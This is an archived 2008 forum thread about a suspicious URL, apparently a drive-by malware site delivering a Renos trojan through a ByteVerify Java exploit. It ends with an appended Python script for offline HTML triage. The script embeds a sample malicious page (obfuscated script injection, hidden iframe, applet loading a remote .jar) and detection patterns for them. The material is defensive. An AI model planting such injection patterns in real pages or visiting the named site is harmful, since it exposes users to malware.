Velocity Reviews - Computer Hardware Reviews

suspicious site

Rick Merrill
01-24-2008
how do you check out something like this?

volny.cz/svhgjtt/dental-plan.html
 
David H. Lipman
01-24-2008
From: "Rick Merrill" <(E-Mail Removed)>

| how do you check out something like this?
|
| volny.cz/svhgjtt/dental-plan.html

It is a malware-related web site that uses VBS/Psyme to download a Renos trojan and a
ByteVerify exploit to install a rogue anti-malware utility called Spy-Shredder.


--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp


 
Rick Merrill
01-24-2008
David H. Lipman wrote:
> From: "Rick Merrill" <(E-Mail Removed)>
>
> | how do you check out something like this?
> |
> | volny.cz/svhgjtt/dental-plan.html
>
> It is a malware-related web site that uses VBS/Psyme to download a Renos trojan and a
> ByteVerify exploit to install a rogue anti-malware utility called Spy-Shredder.
>
>


I didn't know about 'ByteVerify', but it appears to be a hijacked site;
'from whom' it was hijacked I couldn't tell. Is the whole 'cz'
domain not to be trusted?

 
David H. Lipman
01-24-2008
From: "Rick Merrill" <(E-Mail Removed)>


| I didn't know about 'ByteVerify', but it appears to be a hijacked site;
| 'from whom' it was hijacked I couldn't tell. Is the whole 'cz'
| domain not to be trusted?

The ByteVerify is a Java exploit.

Example McAfee log...
5/5/2007 6:58:39 PM Deleted (Clean failed) DLIPMAN-1\lipman
D:\temp\jar_cache30809.tmp\JAR_CACHE30809.TMP Exploit-ByteVerify

It is NOT a hijacked site. It is purposefully malicious.
I cannot state that all .CZ (Czech Republic) domains cannot be trusted.

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp


 
Sebastian G.
01-25-2008
David H. Lipman wrote:


> D:\temp\jar_cache30809.tmp\JAR_CACHE30809.TMP Exploit-ByteVerify
>
> It is NOT a hijacked site. It is purposefully malicious.
> I can not state that all .CZ (Czech Republic) Domains can not be trusted.


But what we can tell for sure is that the owner is horribly stupid. The Byte
Verifier vulnerability was, well, Java JDK 1.1? Even the similar-to-Java-
but-not-actually-Java VM that Microsoft shipped with Windows 2000 and XP was
already at JDK 1.2 level, not vulnerable to this thing.

I still wonder how this thing is still in use, even though the most stupid
bad guy would recognize an infection rate of essentially zero.
 
David H. Lipman
01-25-2008
From: "Sebastian G." <(E-Mail Removed)>


|
| But what we can tell for sure is that the owner is horribly stupid. The Byte
| Verifier vulnerability was, well, Java JDK 1.1? Even the similar-to-Java-
| but-not-actually-Java VM that Microsoft shipped with Windows 2000 and XP was
| already at JDK 1.2 level, not vulnerable to this thing.
|
| I still wonder how this thing is still in use, even though the most stupid
| bad guy would recognize an infection rate of essentially zero.

Exploit-ByteVerify is rather generic. Many newer versions of Sun Java were also vulnerable.
There have been many variants to ByteVerify and they seem to increase.

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp


 
Sebastian G.
01-25-2008
David H. Lipman wrote:


> | But what we can tell for sure is that the owner is horribly stupid. The Byte
> | Verifier vulnerability was, well, Java JDK 1.1? Even the similar-to-Java-
> | but-not-actually-Java VM that Microsoft shipped with Windows 2000 and XP was
> | already at JDK 1.2 level, not vulnerable to this thing.
> |
> | I still wonder how this thing is still in use, even though the most stupid
> | bad guy would recognize an infection rate of essentially zero.
>
> Exploit-ByteVerify is rather generic. Many newer versions of Sun Java were also vulnerable.



Hm? I've followed through the release notes of every version of Sun's Java
VM since JDK 1.2 and I'm very sure that they never mentioned any security
vulnerability in the bytecode verifier. Not even after they changed the
class format for helping implement the much simpler and more secure
SSA-based verifier.

> There have been many variants to ByteVerify and they seem to increase.


According to my analysis, it's the same old dysfunctional crap from '98.
 
blackhat
01-26-2008
On Jan 23, 7:20 pm, Rick Merrill <(E-Mail Removed)> wrote:
> how do you check out something like this?
>
> volny.cz/svhgjtt/dental-plan.html


You don't; just stay away from it.
 
Casper
02-01-2008
Rick Merrill brought next idea:
> how do you check out something like this?
>
> volny.cz/svhgjtt/dental-plan.html


I use a text browser like Lynx to go to suspicious sites
(there is also a Lynx for Windows).


 
Todd H.
02-01-2008
Rick Merrill <(E-Mail Removed)> writes:

> how do you check out something like this?
>
> volny.cz/svhgjtt/dental-plan.html


Curl would pull the HTML down and dump it in a text file -- handy
command-line tool.

--
Todd H.
http://www.toddh.net/
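The last two replies both suggest the same defensive workflow: fetch the page with a tool that does not execute scripts or applets (Lynx, or `curl -sS -o page.html URL`), then read the saved file instead of rendering it. The script below is an added example, not code from any poster in this thread, showing what that offline reading step can look like once the HTML is on disk: it parses the file with Python's standard-library `html.parser` and flags the constructs a drive-by page of the kind David describes typically relies on (external and obfuscated scripts, zero-sized or hidden iframes, and Java applet/object tags). The sample page embedded in it is constructed for the example and the `example.invalid` hostnames are placeholders, not the site from the thread.

```python
"""Offline triage of an HTML page that was saved to disk with curl or Lynx.

Nothing here fetches anything or runs script: the page is only parsed,
so the inspection itself cannot trigger the exploit chain the page carries.
"""
import re
import sys
from html.parser import HTMLParser

# Constructed sample page (not the site discussed in the thread). It mimics
# the usual drive-by layout: a remote loader script, an escaped inline
# document.write, a hidden iframe and a tiny Java applet.
SAMPLE_HTML = """<html><head><title>Dental Plan</title>
<script src="http://example.invalid/js/loader.js"></script>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//example.invalid/x.html%22%3E'));</script>
</head><body>
<p>Affordable dental plans</p>
<iframe src="http://example.invalid/counter.php" width="0" height="0" style="visibility:hidden"></iframe>
<applet code="BlackBox.class" archive="http://example.invalid/count.jar" width="1" height="1"></applet>
</body></html>"""

# Inline-script idioms that usually mean the real payload is hidden from grep.
OBFUSCATION_RE = re.compile(r"unescape\(|eval\(|String\.fromCharCode|document\.write\(", re.I)


class TriageParser(HTMLParser):
    """Collects the tags worth a second look; html.parser treats <script>
    bodies as raw CDATA, so handle_data receives the script text verbatim."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []     # src= of external scripts
        self.inline_scripts = []  # text of inline <script> blocks
        self.iframes = []         # attribute dicts of <iframe>
        self.applets = []         # attribute dicts of <applet>/<object>/<embed>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_srcs.append(a["src"])
        elif tag == "iframe":
            self.iframes.append(a)
        elif tag in ("applet", "object", "embed"):
            self.applets.append(a)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline_scripts.append(data.strip())


def is_hidden(attrs):
    """A frame sized to 0/1 pixels or hidden by CSS has no legitimate reason
    to load a remote document; that is the classic drive-by injection shape."""
    style = attrs.get("style", "").lower().replace(" ", "")
    return (attrs.get("width", "") in ("0", "1")
            or attrs.get("height", "") in ("0", "1")
            or "hidden" in style
            or "display:none" in style)


def triage(html):
    """Return a list of (finding-kind, detail) pairs for the given HTML text."""
    p = TriageParser()
    p.feed(html)
    findings = []
    for src in p.script_srcs:
        findings.append(("external-script", src))
    for s in p.inline_scripts:
        if OBFUSCATION_RE.search(s):
            findings.append(("obfuscated-inline-script", s[:60]))
    for f in p.iframes:
        if is_hidden(f):
            findings.append(("hidden-iframe", f.get("src", "")))
    for a in p.applets:
        # For applets the archive (the .jar) is the artifact to hash and submit.
        findings.append(("java-applet", a.get("archive") or a.get("code") or a.get("data", "")))
    return findings


def verdict(findings):
    """Hidden frames, obfuscated script or applets on a 'dental plan' page
    are enough to treat the URL as hostile without ever opening it."""
    strong = {"hidden-iframe", "obfuscated-inline-script", "java-applet"}
    return "suspicious" if any(k in strong for k, _ in findings) else "nothing flagged"


if __name__ == "__main__":
    # Usage: python triage.py page.html   (falls back to the built-in sample)
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_HTML
    results = triage(text)
    for kind, detail in results:
        print(f"{kind:26s} {detail}")
    print("verdict:", verdict(results))
```

The point of doing the inspection this way is that the parser never evaluates the JavaScript or loads the applet, so the `unescape`/`document.write` wrapper that hides the second-stage iframe from a casual `grep` is still visible as a string, and the external script and `.jar` URLs it exposes are the artifacts to hash, block and submit to AV rather than visit.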
 